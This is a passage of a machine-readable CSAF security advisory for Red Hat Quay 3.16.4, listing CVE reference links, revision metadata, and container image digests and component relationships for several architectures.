        "summary": "https://access.redhat.com/security/cve/CVE-2026-32280",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32280"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32282",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32286",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32589",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32590",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32597",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32597"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33894",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
        "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-39892",
        "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4427",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4598",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4598"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4599",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4599"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4600",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4600"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4601",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4601"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-4602",
        "url": "https://access.redhat.com/security/cve/CVE-2026-4602"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_19375.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Quay 3.16.4",
    "tracking": {
      "current_release_date": "2026-06-30T15:49:11+00:00",
      "generator": {
        "date": "2026-06-30T15:49:11+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.3.1"
        }
      },
      "id": "RHSA-2026:19375",
      "initial_release_date": "2026-05-19T21:01:11+00:00",
      "revision_history": [
        {
          "date": "2026-05-19T21:01:11+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-06-01T19:33:53+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-30T15:49:11+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Quay 3.16",
                "product": {
                  "name": "Red Hat Quay 3.16",
                  "product_id": "Red Hat Quay 3.16",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:quay:3.16::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Quay"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3Aae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778705065"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704515"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778705175"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3Af610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704509"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778705015"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704550"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3Af423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704556"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-bundle@sha256%3A631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1779209336"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3A74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1779135957"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3A139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1779204086"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704515"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704509"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704550"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3A478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704556"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3Ae77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1779135957"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3Af6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1779204086"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3A9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704515"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704509"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel9@sha256%3A8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704550"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
                  "product_id": "registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel9@sha256%3A4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1778704556"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel9@sha256%3A2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1779135957"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3Aad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1779204086"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
                  "product_id": "registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel9@sha256%3A52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2?arch=arm64\u0026repository_url=registry.redhat.io/quay\u0026tag=1779204086"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "arm64"
          }
        ],
        "category": "vendor",
        "name": "Red Hat"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64"
        },
        "product_reference": "registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64"
        },
        "product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
        "relates_to_product_reference": "Red Hat Quay 3.16"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64 as a component of Red Hat Quay 3.16",
          "product_id": "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64"
        },
